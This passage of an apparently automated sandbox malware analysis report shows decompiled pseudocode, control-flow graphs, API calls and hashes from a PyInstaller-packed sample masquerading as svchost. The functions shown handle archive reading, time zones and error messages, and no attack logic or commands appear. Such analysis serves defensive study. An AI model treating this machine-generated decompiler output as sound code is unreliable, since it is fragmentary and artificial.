					_t51 = _t49 + 0x10;
					__eflags = _t32;
					if(__eflags != 0) {
						_push( *_t39);
						L00BC7864();
						_t14 = E00BC9B2B(_t32, _t13,  *((intOrPtr*)(_t44 + 8)), 1); // executed
						_t52 = _t51 + 0x10;
						__eflags = _t14 - 1;
						if(__eflags >= 0) {
							__eflags =  *((char*)(_t44 + 0x10)) - 1;
							if(__eflags != 0) {
								L10:
								_t15 =  *_t39;
								__eflags = _t15;
								if(__eflags != 0) {
									_push(_t15); // executed
									E00BC9889(_t37, _t38, __eflags); // executed
									 *_t39 = 0;
								}
								return _t32;
							} else {
								_push(_t44);
								_t41 = E00BC1030(_t14, _t37, __eflags, _t32);
								L00BC9803(_t32);
								_t52 = _t52 + 0xc;
								_t32 = _t41;
								__eflags = _t41;
								if(__eflags != 0) {
									goto L10;
								} else {
									E00BC1980(__eflags, "Error decompressing %s\n", _t44 + 0x12);
									__eflags = 0;
									return 0;
								}
							}
						} else {
							_push("Could not read from file\n");
							E00BC1980(__eflags);
							L00BC9803(_t32);
							__eflags = 0;
							return 0;
						}
					} else {
						_push("Could not allocate read buffer\n");
						E00BC1980(__eflags);
						__eflags = 0;
						return 0;
					}
				} else {
					_t10 = E00BC28C0(_t39 + 0x68, "rb");
					_t49 = _t49 + 8;
					 *_t39 = _t10;
					_t59 = _t10;
					if(_t10 != 0) {
						goto L3;
					} else {
						_push("Cannot open archive file\n");
						E00BC1980(_t59);
						return 0;
					}
				}
			}

















                            0x00bc1220
                            0x00bc1220
                            0x00bc1221
                            0x00bc1228
                            0x00bc1252
                            0x00bc1254
                            0x00bc1258
                            0x00bc125d
                            0x00bc1268
                            0x00bc1270
                            0x00bc1273
                            0x00bc1278
                            0x00bc127e
                            0x00bc1280
                            0x00bc1283
                            0x00bc1285
                            0x00bc129a
                            0x00bc12a1
                            0x00bc12a8
                            0x00bc12ad
                            0x00bc12b0
                            0x00bc12b3
                            0x00bc12ce
                            0x00bc12d2
                            0x00bc1305
                            0x00bc1305
                            0x00bc1307
                            0x00bc1309
                            0x00bc130b
                            0x00bc130c
                            0x00bc1314
                            0x00bc1314
                            0x00bc131f
                            0x00bc12d4
                            0x00bc12d5
                            0x00bc12dd
                            0x00bc12df
                            0x00bc12e4
                            0x00bc12e7
                            0x00bc12e9
                            0x00bc12ec
                            0x00000000
                            0x00bc12ee
                            0x00bc12f7
                            0x00bc12ff
                            0x00bc1304
                            0x00bc1304
                            0x00bc12ec
                            0x00bc12b5
                            0x00bc12b5
                            0x00bc12ba
                            0x00bc12c0
                            0x00bc12c8
                            0x00bc12cd
                            0x00bc12cd
                            0x00bc1287
                            0x00bc1287
                            0x00bc128c
                            0x00bc1294
                            0x00bc1299
                            0x00bc1299
                            0x00bc122a
                            0x00bc1233
                            0x00bc1238
                            0x00bc123b
                            0x00bc123d
                            0x00bc123f
                            0x00000000
                            0x00bc1241
                            0x00bc1241
                            0x00bc1246
                            0x00bc1251
                            0x00bc1251
                            0x00bc123f

                            APIs
                            Strings
                            • Could not read from file, xrefs: 00BC12B5
                            • Cannot open archive file, xrefs: 00BC1241
                            • Could not allocate read buffer, xrefs: 00BC1287
                            • Error decompressing %s, xrefs: 00BC12F2
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Cannot open archive file$Could not allocate read buffer$Could not read from file$Error decompressing %s
                            • API String ID: 3757756281-3387914768
                            • Opcode ID: a0e16a2aff6a1af9f9eeb62510c37e7bf12016e43c9a41294a4edaa1a4f55a99
                            • Instruction ID: 2bc9e8a908702293df9303059d4bd4932d1db51ea6edca98a05496920bb14261
                            • Opcode Fuzzy Hash: a0e16a2aff6a1af9f9eeb62510c37e7bf12016e43c9a41294a4edaa1a4f55a99
                            • Instruction Fuzzy Hash: 43210BB2A042057AFB007A79BC46F5EB7CCEF52354F5409F9F904E1203FBA2D9508661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDB193, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171timeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 590 bdb193-bdb1bb call bdabfc call bdac5a 595 bdb1c1-bdb1cd call bdac02 590->595 596 bdb2e3-bdb33f call bd1798 call bd6cc0 590->596 595->596 601 bdb1d3-bdb1df call bdac2e 595->601 607 bdb349-bdb34c 596->607 608 bdb341-bdb347 596->608 601->596 609 bdb1e5-bdb206 call bd09eb GetTimeZoneInformation 601->609 610 bdb38f-bdb3a1 607->610 611 bdb34e-bdb35e call bd0a25 607->611 608->610 619 bdb20c-bdb22d 609->619 620 bdb2bf-bdb2e2 call bdabf6 call bdabea call bdabf0 609->620 613 bdb3b1 call bdb193 610->613 614 bdb3a3-bdb3a6 610->614 623 bdb368-bdb381 call bd6cc0 611->623 624 bdb360 611->624 628 bdb3b6-bdb3cd call bd09eb call bc786a 613->628 614->613 617 bdb3a8-bdb3af call bdafbe 614->617 617->628 626 bdb22f-bdb234 619->626 627 bdb237-bdb23e 619->627 644 bdb386-bdb38c call bd09eb 623->644 645 bdb383-bdb384 623->645 630 bdb361-bdb366 call bd09eb 624->630 626->627 633 bdb256-bdb259 627->633 634 bdb240-bdb247 627->634 648 bdb38e 630->648 636 bdb25c-bdb27d call bd7d59 WideCharToMultiByte 633->636 634->633 640 bdb249-bdb254 634->640 654 bdb27f-bdb282 636->654 655 bdb28b-bdb28d 636->655 640->636 644->648 645->630 648->610 654->655 657 bdb284-bdb289 654->657 658 bdb28f-bdb2ab WideCharToMultiByte 655->658 657->658 659 bdb2ad-bdb2b0 658->659 660 bdb2ba-bdb2bd 658->660 659->660 661 bdb2b2-bdb2b8 659->661 660->620 661->620
                            C-Code - Quality: 73%
                            			E00BDB193(void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				void* _t45;
				signed int _t49;
				void* _t53;
				void* _t55;
				long _t57;
				signed int* _t60;
				intOrPtr _t70;
				void* _t79;
				signed int _t86;
				void* _t88;
				signed int _t89;
				signed int _t91;
				int _t95;
				void* _t97;
				char** _t98;
				signed int _t102;
				signed int _t104;
				signed int _t110;
				signed int _t111;
				intOrPtr _t120;
				intOrPtr _t122;

				_t98 = E00BDABFC();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E00BDAC5A( &_v8);
				_t79 = _t97;
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00BD1798();
					asm("int3");
					_t110 = _t111;
					_t38 =  *0xbec008; // 0x2eb5fe5e
					_v56 = _t38 ^ _t110;
					 *0xbec91c =  *0xbec91c | 0xffffffff;
					 *0xbec910 =  *0xbec910 | 0xffffffff;
					_push(0);
					_push(_t98);
					_t76 = "TZ";
					_t91 = 0;
					 *0xbf6578 = 0;
					_t42 = E00BD6CC0("TZ", _t88, 0, _t98, __eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t104 = E00BD0A25(_t79, _v272);
							__eflags = _t104;
							if(__eflags != 0) {
								_t49 = E00BD6CC0(_t76, _t88, 0, _t104, __eflags,  &_v276, _t104, _v272, _t76);
								__eflags = _t49;
								if(_t49 == 0) {
									E00BD09EB(0);
									_t91 = _t104;
								} else {
									_push(_t104);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E00BD09EB();
							}
						}
					} else {
						_t91 =  &_v268;
					}
					asm("sbb esi, esi");
					_t102 =  ~(_t91 -  &_v268) & _t91;
					__eflags = _t91;
					if(__eflags == 0) {
						L33:
						E00BDB193(__eflags); // executed
					} else {
						__eflags =  *_t91;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t91);
							E00BDAFBE(__eflags);
						}
					}
					_t45 = E00BD09EB(_t102);
					__eflags = _v12 ^ _t110;
					E00BC786A();
					return _t45;
				} else {
					_t53 = E00BDAC02( &_v12);
					_pop(_t79);
					if(_t53 != 0) {
						goto L19;
					} else {
						_t55 = E00BDAC2E( &_v16);
						_pop(_t79);
						if(_t55 != 0) {
							goto L19;
						} else {
							E00BD09EB( *0xbf6574);
							 *0xbf6574 = 0;
							 *_t111 = 0xbf6580; // executed
							_t57 = GetTimeZoneInformation(??); // executed
							if(_t57 != 0xffffffff) {
								_t86 =  *0xbf6580 * 0x3c;
								_t89 =  *0xbf65d4; // 0x0
								_push(_t90);
								 *0xbf6578 = 1;
								_v8 = _t86;
								_t120 =  *0xbf65c6; // 0xb
								if(_t120 != 0) {
									_v8 = _t86 + _t89 * 0x3c;
								}
								_t122 =  *0xbf661a; // 0x3
								if(_t122 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t70 =  *0xbf6628; // 0xffffffc4
									if(_t70 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t70 - _t89) * 0x3c;
									}
								}
								_t95 = E00BD7D59(0, _t89);
								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff,  *_t98, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t98) = 0;
								} else {
									( *_t98)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff, _t98[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t98[1]) = 0;
								} else {
									_t98[1][0x3f] = 0;
								}
							}
							 *(E00BDABF6()) = _v8;
							 *(E00BDABEA()) = _v12;
							_t60 = E00BDABF0();
							 *_t60 = _v16;
							return _t60;
						}
					}
				}
			}









































                            0x00bdb1a2
                            0x00bdb1a9
                            0x00bdb1ad
                            0x00bdb1b0
                            0x00bdb1b3
                            0x00bdb1b8
                            0x00bdb1bb
                            0x00bdb2e3
                            0x00bdb2e3
                            0x00bdb2e4
                            0x00bdb2e5
                            0x00bdb2e6
                            0x00bdb2e7
                            0x00bdb2e8
                            0x00bdb2ed
                            0x00bdb2f1
                            0x00bdb2f9
                            0x00bdb300
                            0x00bdb303
                            0x00bdb310
                            0x00bdb317
                            0x00bdb318
                            0x00bdb31a
                            0x00bdb31f
                            0x00bdb32e
                            0x00bdb335
                            0x00bdb33d
                            0x00bdb33f
                            0x00bdb349
                            0x00bdb34c
                            0x00bdb359
                            0x00bdb35c
                            0x00bdb35e
                            0x00bdb377
                            0x00bdb37f
                            0x00bdb381
                            0x00bdb387
                            0x00bdb38c
                            0x00bdb383
                            0x00bdb383
                            0x00000000
                            0x00bdb383
                            0x00bdb360
                            0x00bdb360
                            0x00bdb361
                            0x00bdb361
                            0x00bdb361
                            0x00bdb38e
                            0x00bdb341
                            0x00bdb341
                            0x00bdb341
                            0x00bdb39b
                            0x00bdb39d
                            0x00bdb39f
                            0x00bdb3a1
                            0x00bdb3b1
                            0x00bdb3b1
                            0x00bdb3a3
                            0x00bdb3a3
                            0x00bdb3a6
                            0x00000000
                            0x00bdb3a8
                            0x00bdb3a8
                            0x00bdb3a9
                            0x00bdb3ae
                            0x00bdb3a6
                            0x00bdb3b7
                            0x00bdb3c2
                            0x00bdb3c5
                            0x00bdb3cd
                            0x00bdb1c1
                            0x00bdb1c5
                            0x00bdb1ca
                            0x00bdb1cd
                            0x00000000
                            0x00bdb1d3
                            0x00bdb1d7
                            0x00bdb1dc
                            0x00bdb1df
                            0x00000000
                            0x00bdb1e5
                            0x00bdb1eb
                            0x00bdb1f0
                            0x00bdb1f6
                            0x00bdb1fd
                            0x00bdb206
                            0x00bdb20c
                            0x00bdb213
                            0x00bdb219
                            0x00bdb21d
                            0x00bdb223
                            0x00bdb226
                            0x00bdb22d
                            0x00bdb234
                            0x00bdb234
                            0x00bdb237
                            0x00bdb23e
                            0x00bdb256
                            0x00bdb256
                            0x00bdb259
                            0x00bdb240
                            0x00bdb240
                            0x00bdb247
                            0x00000000
                            0x00bdb249
                            0x00bdb24b
                            0x00bdb251
                            0x00bdb251
                            0x00bdb247
                            0x00bdb261
                            0x00bdb27d
                            0x00bdb28d
                            0x00bdb284
                            0x00bdb286
                            0x00bdb286
                            0x00bdb2ab
                            0x00bdb2bd
                            0x00bdb2b2
                            0x00bdb2b5
                            0x00bdb2b5
                            0x00bdb2ab
                            0x00bdb2c7
                            0x00bdb2d1
                            0x00bdb2d6
                            0x00bdb2db
                            0x00bdb2e2
                            0x00bdb2e2
                            0x00bdb1df
                            0x00bdb1cd

                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            • _free.LIBCMT ref: 00BDB1EB
                              • Part of subcall function 00BD09EB: HeapFree.KERNEL32(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BDB3B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            • API String ID: 1286116820-1154798116
                            • Opcode ID: bd4bbd1b4e20834c4fffbb86b8ef8d887d43cd00bdd531bdcc48f66409533240
                            • Instruction ID: 66f892b77dee4397ea6433c1b2d4c7b942ce8ce43d0fadee5be88eb5d94a353e
                            • Opcode Fuzzy Hash: bd4bbd1b4e20834c4fffbb86b8ef8d887d43cd00bdd531bdcc48f66409533240
                            • Instruction Fuzzy Hash: C251A572900209EBCB10DF659C81DBEFBF8EB51360B1102EBE914A7391FB308E418B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC4860, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 46windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 63%
                            			E00BC4860(void* __edx, signed int _a8192, long _a8200) {
				short _v0;
				signed int _t8;
				long _t10;
				long _t11;
				void* _t24;
				signed int _t26;

				_t24 = __edx;
				E00BC7880();
				_t8 =  *0xbec008; // 0x2eb5fe5e
				_a8192 = _t8 ^ _t26;
				_t10 = _a8200;
				if(_t10 == 0) {
					_t10 = GetLastError();
				}
				_t11 = FormatMessageW(0x1000, 0, _t10, 0x400,  &_v0, 0x1000, 0); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					__eflags = E00BC4C90("An attempt to set the process default activation context failed because the process default activation context was already set.",  &_v0, 0x1000);
					_t19 =  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
					_t14 =  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
					__eflags = _a8192 ^ _t26 + 0x0000000c;
					E00BC786A();
					return  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
				} else {
					_push("No error messages generated.\n");
					_push("FormatMessageW");
					E00BC1860(_t24, _t32);
					E00BC786A();
					return "PyInstaller: FormatMessageW failed.";
				}
			}









                            0x00bc4860
                            0x00bc4865
                            0x00bc486a
                            0x00bc4871
                            0x00bc4878
                            0x00bc4881
                            0x00bc4883
                            0x00bc4883
                            0x00bc48a2
                            0x00bc48a8
                            0x00bc48aa
                            0x00bc48f4
                            0x00bc48fb
                            0x00bc48fe
                            0x00bc4907
                            0x00bc4909
                            0x00bc4914
                            0x00bc48ac
                            0x00bc48ac
                            0x00bc48b1
                            0x00bc48b6
                            0x00bc48cc
                            0x00bc48d7
                            0x00bc48d7

                            APIs
                            • GetLastError.KERNEL32(00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC4883
                              • Part of subcall function 00BC4C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00BC48EC,An attempt to set the process default activation context failed because the process default activation context was already set.,?,00001000,?,?), ref: 00BC4CAA
                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC48A2
                            Strings
                            • FormatMessageW, xrefs: 00BC48B1
                            • PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00BC48EF
                            • PyInstaller: FormatMessageW failed., xrefs: 00BC48BE
                            • An attempt to set the process default activation context failed because the process default activation context was already set., xrefs: 00BC48E2, 00BC48F6
                            • No error messages generated., xrefs: 00BC48AC
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharErrorFormatLastMessageMultiWide
                            • String ID: An attempt to set the process default activation context failed because the process default activation context was already set.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.
                            • API String ID: 1653872744-3426200897
                            • Opcode ID: 79ef3ce4417318f701a17545daf031b251ca31d6fc0ef810f8558b501ab9a8a3
                            • Instruction ID: cccf77c7ea2987186795681d30ab65b60c4e6ee22a1ca252778115d5b296ea72
                            • Opcode Fuzzy Hash: 79ef3ce4417318f701a17545daf031b251ca31d6fc0ef810f8558b501ab9a8a3
                            • Instruction Fuzzy Hash: 110188717943806BF718D7199C9BFAA32D5EB48741F4044ACB749CA1D2FB709844C757
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCCBFB, Relevance: 6.2, APIs: 4, Instructions: 172pipeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 677 bccbfb-bccc33 GetFileType 678 bccd2e-bccd31 677->678 679 bccc39-bccc44 677->679 680 bccd5a-bccd82 678->680 681 bccd33-bccd36 678->681 682 bccc66-bccc81 call bd38bb 679->682 683 bccc46-bccc57 call bccf93 679->683 686 bccd9f-bccda1 680->686 687 bccd84-bccd97 PeekNamedPipe 680->687 681->680 684 bccd38-bccd3a 681->684 690 bccd4b-bccd58 GetLastError call bcc998 682->690 700 bccc87-bcccb2 call bccf2d call bccdb3 682->700 697 bccc5d-bccc64 683->697 698 bccd47-bccd49 683->698 689 bccd3c-bccd41 call bcc9ce 684->689 684->690 693 bccda2-bccdb2 call bc786a 686->693 687->686 692 bccd99-bccd9c 687->692 689->698 690->698 692->686 697->682 698->693 700->698 708 bcccb8-bcccd5 call bccdb3 700->708 708->698 711 bcccd7-bccce3 call bccdb3 708->711 713 bccce8-bcccf6 711->713 713->698 714 bcccf8-bccd16 call bd38bb 713->714 714->690 717 bccd18-bccd2c call bccefb 714->717 717->693
                            C-Code - Quality: 100%
                            			E00BCCBFB(signed int __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v48;
				char _v64;
				void _v72;
				long _v76;
				intOrPtr _v80;
				char _v84;
				void* __ebx;
				signed int _t53;
				signed int _t56;
				intOrPtr _t66;
				signed int _t68;
				int _t70;
				signed int _t81;
				signed int _t83;
				signed int _t85;
				intOrPtr _t98;
				signed int _t104;
				signed int _t109;
				signed int _t111;
				signed int _t118;
				void* _t121;
				intOrPtr* _t128;
				signed int _t130;
				intOrPtr _t140;

				_t118 = __edx;
				_t53 =  *0xbec008; // 0x2eb5fe5e
				_v8 = _t53 ^ _t130;
				_t128 = _a16;
				_t121 = _a12;
				_v80 = _a4;
				_v76 = _t121;
				_t56 = GetFileType(_t121); // executed
				_t104 = _t56 & 0xffff7fff;
				if(_t104 != 1) {
					__eflags = _t104 - 2;
					if(_t104 == 2) {
						L16:
						__eflags = _t104 - 2;
						 *((short*)(_t128 + 6)) = ((0 | _t104 != 0x00000002) - 0x00000001 & 0x00001000) + 0x1000;
						 *((short*)(_t128 + 8)) = 1;
						_t66 = _a8;
						 *((intOrPtr*)(_t128 + 0x10)) = _t66;
						 *_t128 = _t66;
						__eflags = _t104 - 2;
						if(_t104 != 2) {
							_t70 = PeekNamedPipe(_t121, 0, 0, 0,  &_v76, 0);
							__eflags = _t70;
							if(_t70 != 0) {
								 *((intOrPtr*)(_t128 + 0x14)) = _v76;
							}
						}
						_t68 = 1;
						__eflags = 1;
						L20:
						E00BC786A();
						return _t68;
					}
					__eflags = _t104 - 3;
					if(_t104 == 3) {
						goto L16;
					}
					__eflags = _t104;
					if(_t104 != 0) {
						L15:
						E00BCC998(GetLastError());
						L14:
						_t68 = 0;
						goto L20;
					}
					 *((intOrPtr*)(E00BCC9CE())) = 9;
					goto L14;
				}
				 *((short*)(_t128 + 8)) = 1;
				_t74 = _v80;
				if(_v80 == 0) {
					L4:
					_t109 = 0xa;
					memset( &_v48, 0, _t109 << 2);
					if(E00BD38BB(0, _t140, _v76, 0,  &_v48, 0x28) == 0) {
						goto L15;
					}
					 *((short*)(_t128 + 6)) = E00BCCF2D(0, _v16, _v80);
					_t81 = E00BCCDB3(_v32, _v28, 0, 0); // executed
					 *(_t128 + 0x20) = _t81;
					 *(_t128 + 0x24) = _t118;
					if((_t81 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t24 = _t128 + 0x20; // 0x83cc758d
					_t83 = E00BCCDB3(_v40, _v36,  *_t24, _t118); // executed
					 *(_t128 + 0x18) = _t83;
					 *(_t128 + 0x1c) = _t118;
					if((_t83 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t29 = _t128 + 0x24; // 0xcb830cc4
					_t30 = _t128 + 0x20; // 0x83cc758d
					_t85 = E00BCCDB3(_v48, _v44,  *_t30,  *_t29); // executed
					 *(_t128 + 0x28) = _t85;
					 *(_t128 + 0x2c) = _t118;
					_t144 = (_t85 & _t118) - 0xffffffff;
					if((_t85 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t111 = 6;
					memset( &_v72, 0, _t111 << 2);
					if(E00BD38BB(0, _t144, _v76, 1,  &_v72, 0x18) == 0) {
						goto L15;
					}
					_t39 = _t128 + 0x14; // 0xbccb3d
					_t68 = E00BCCEFB( &_v64, _t39) & 0xffffff00 | _t95 != 0x00000000;
					goto L20;
				}
				_v84 = 0;
				if(E00BCCF93(_t74,  &_v84) == 0) {
					goto L14;
				}
				_t98 = _v84 - 1;
				_t140 = _t98;
				 *((intOrPtr*)(_t128 + 0x10)) = _t98;
				 *_t128 = _t98;
				goto L4;
			}


































                            0x00bccbfb
                            0x00bccc03
                            0x00bccc0a
                            0x00bccc12
                            0x00bccc16
                            0x00bccc1a
                            0x00bccc1d
                            0x00bccc20
                            0x00bccc2a
                            0x00bccc33
                            0x00bccd2e
                            0x00bccd31
                            0x00bccd5a
                            0x00bccd61
                            0x00bccd6c
                            0x00bccd73
                            0x00bccd77
                            0x00bccd7a
                            0x00bccd7d
                            0x00bccd7f
                            0x00bccd82
                            0x00bccd8f
                            0x00bccd95
                            0x00bccd97
                            0x00bccd9c
                            0x00bccd9c
                            0x00bccd97
                            0x00bccda1
                            0x00bccda1
                            0x00bccda2
                            0x00bccdaa
                            0x00bccdb2
                            0x00bccdb2
                            0x00bccd33
                            0x00bccd36
                            0x00000000
                            0x00000000
                            0x00bccd38
                            0x00bccd3a
                            0x00bccd4b
                            0x00bccd52
                            0x00bccd47
                            0x00bccd47
                            0x00000000
                            0x00bccd47
                            0x00bccd41
                            0x00000000
                            0x00bccd41
                            0x00bccc39
                            0x00bccc3f
                            0x00bccc44
                            0x00bccc66
                            0x00bccc68
                            0x00bccc70
                            0x00bccc81
                            0x00000000
                            0x00000000
                            0x00bccc98
                            0x00bccc9f
                            0x00bccca4
                            0x00bcccac
                            0x00bcccb2
                            0x00000000
                            0x00000000
                            0x00bcccb9
                            0x00bcccc2
                            0x00bcccc7
                            0x00bccccf
                            0x00bcccd5
                            0x00000000
                            0x00000000
                            0x00bcccd7
                            0x00bcccda
                            0x00bccce3
                            0x00bccce8
                            0x00bcccf0
                            0x00bcccf3
                            0x00bcccf6
                            0x00000000
                            0x00000000
                            0x00bcccfa
                            0x00bccd00
                            0x00bccd16
                            0x00000000
                            0x00000000
                            0x00bccd18
                            0x00bccd29
                            0x00000000
                            0x00bccd29
                            0x00bccc49
                            0x00bccc57
                            0x00000000
                            0x00000000
                            0x00bccc60
                            0x00bccc60
                            0x00bccc61
                            0x00bccc64
                            0x00000000

                            APIs
                            • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00BCCC20
                              • Part of subcall function 00BCCF93: __dosmaperr.LIBCMT ref: 00BCCFD6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BCCB29), ref: 00BCCD4B
                            • __dosmaperr.LIBCMT ref: 00BCCD52
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00BCCD8F
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __dosmaperr$ErrorFileLastNamedPeekPipeType
                            • String ID:
                            • API String ID: 3955570002-0
                            • Opcode ID: f394a0604df45b45da60c29c8642a64fa1ffb7d7d306d9b5e0063e159d6fd88f
                            • Instruction ID: e9b46a2f8cf11b53259e913c3f8b379091bb73f3fe4e20c5d45db6fd7413b7b7
                            • Opcode Fuzzy Hash: f394a0604df45b45da60c29c8642a64fa1ffb7d7d306d9b5e0063e159d6fd88f
                            • Instruction Fuzzy Hash: 5551A172900608AFDB14DFB8CC41EAEBFF9EF18310B14857DE55AD7260EB7099459B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC1120, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 720 bc1120-bc1153 call bc9f16 call bc9b2b 725 bc1159-bc115c 720->725 726 bc11f2-bc11f7 720->726 725->726 727 bc1162-bc1189 call bc9f16 call bc9b2b call bc9f16 725->727 733 bc118e-bc11a8 call bc9b2b 727->733 733->726 736 bc11aa-bc11ad 733->736 737 bc11af-bc11b4 736->737 738 bc11b6-bc11b9 736->738 739 bc11c0-bc11f1 call bc9f16 call bc9b2b 737->739 738->726 740 bc11bb 738->740 740->739
                            C-Code - Quality: 100%
                            			E00BC1120(void* __edx, void* _a4) {
				char _v4;
				signed int _t15;
				intOrPtr _t30;
				signed int _t32;

				_t34 = __edx;
